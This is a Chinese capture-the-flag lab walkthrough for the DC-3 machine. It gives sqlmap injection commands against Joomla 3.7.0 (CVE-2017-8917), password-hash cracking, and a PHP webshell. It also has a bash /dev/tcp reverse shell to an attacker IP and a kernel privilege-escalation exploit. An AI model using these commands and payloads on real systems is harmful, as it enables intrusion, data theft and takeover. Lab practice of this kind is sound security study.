小H靶场笔记:DC-3

DC-3

January 3, 2024 4:11 PM
Tags:Joomla
owner:只惠摸鱼

信息收集

  • 探测靶机ip: 192.168.199.133

    小H靶场笔记:DC-3_第1张图片

  • nmap 扫描端口、 系统版本 漏洞

    小H靶场笔记:DC-3_第2张图片

    • 发现只有80端口开发, 且有cve-2017-8917漏洞存在
    • 是Joomla的SQL注入漏洞 Joomla版本为3.7.0
  • 打开页面看一下发现有登录页面,可以尝试弱口令,sql注入 或 爆破(页面有提示。只有一个flag,且为root权限才能看到)

    小H靶场笔记:DC-3_第3张图片

    • 尝试弱口令无果

漏洞利用

  • 使用kali中searchsploit 搜索cve-2017-8917 即搜索joomla 3.7.0的漏洞

在这里插入图片描述

  • 查看内容
    • searchsploit -x php/webapps/42033.txt

      小H靶场笔记:DC-3_第4张图片

    • 发现可以直接使用sqlmap 爆数据库

SQLmap爆数据

  • 爆数据库(默认配置选项)
    • sqlmap -u “http://192.168.199.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
      小H靶场笔记:DC-3_第5张图片

    • 得到数据库joomladb

  • 爆数据库表
    • sqlmap -u “http://192.168.199.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” --tables --batch -p list[fullordering]

      • —batch是为了使其默认使用默认配置选项

      小H靶场笔记:DC-3_第6张图片

    • 得到表#__users

  • 爆表字段名(不能使用默认,需要手动y一下)
    • sqlmap -u “http://192.168.199.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” --columns -p list[fullordering]

      小H靶场笔记:DC-3_第7张图片

    • 只需查字段username 和 password中的值就可以了

  • 爆数据
    • sqlmap -u “http://192.168.199.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” -C “username,password” --dump -p list[fullordering]

      小H靶场笔记:DC-3_第8张图片

    • 拿到admin账号 和一个 hash加密的密码

john解密

  • 密码:$2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu,放入txt文档

    在这里插入图片描述

    • 使用john进行解密
      小H靶场笔记:DC-3_第9张图片

    • 得到管理员账户密码

  • 发现还没有扫过目录,扫一下,看看是不是有管理员登录端(80端口只有用户端)

    • dirb http://192.168.199.133
      小H靶场笔记:DC-3_第10张图片

    • 发现有管理员页面

      小H靶场笔记:DC-3_第11张图片

    • 使用刚才得到的管理员账号密码登录,进入后端管理页面

      小H靶场笔记:DC-3_第12张图片

    • 寻找是否有能上传文件的地方,尝试了一些,都不太行,最后找到了一个可以直接写php代码的页面。

      小H靶场笔记:DC-3_第13张图片

    • 新增一个php文件类型,写入一句话木马
      小H靶场笔记:DC-3_第14张图片

    • 发现上方有提示的路径,尝试直接访问一下

      小H靶场笔记:DC-3_第15张图片

    • 发现不通, 百度了joomla的文件路径
      小H靶场笔记:DC-3_第16张图片

    • 发现一个熟悉的单词, 尝试用这个试一下(没报错,有戏)
      小H靶场笔记:DC-3_第17张图片

      • 继续尝试目录或文件,发现没报错。

        小H靶场笔记:DC-3_第18张图片

      • 尝试一下phpinfo(),成功!

      小H靶场笔记:DC-3_第19张图片

  • 使用蚁剑直接连接
    小H靶场笔记:DC-3_第20张图片

    • 成功连接

      小H靶场笔记:DC-3_第21张图片

    • 打开命令端口,发现不是root 也不是管理员权限

    小H靶场笔记:DC-3_第22张图片

提权

  • 查看系统内核版本

    在这里插入图片描述

  • 直接使用searchsploit Ubuntu 16.04查询相关漏洞,对比内核版本和漏洞类型,使用39772

  • 查看漏洞内容,最上面的连接可以直接拉到浏览器查看详细信息(个人认为比较方便)

    • searchsploit -x linux/local/39772.txt

      小H靶场笔记:DC-3_第23张图片

  • 根据漏洞信息,和下方提供的漏洞下载链接下载到kali,通过蚁剑上传到后台解压exploit(这里是我运行过一次)

    小H靶场笔记:DC-3_第24张图片

  • 将shell反弹给本地

    • 本地监听1234端口

      在这里插入图片描述

    • 被控端运行bash -c 'bash -i >& /dev/tcp/192.168.199.129/1234 0>&1’

    • 本地得到shell

      小H靶场笔记:DC-3_第25张图片

  • 进入到ebpf_mapfd_doubleput_exploit运行./compile.sh会生成doubleput

  • 然后再运行./doubleput等待数秒,得到root权限

    小H靶场笔记:DC-3_第26张图片

  • 生成交互性shell

    • python3 -c 'import pty; pty.spawn(“/bin/bash”)’

      在这里插入图片描述

  • 进入/root 查询文件,找到flag。
    小H靶场笔记:DC-3_第27张图片

你可能感兴趣的:(靶场笔记,笔记,网络安全,安全,web安全)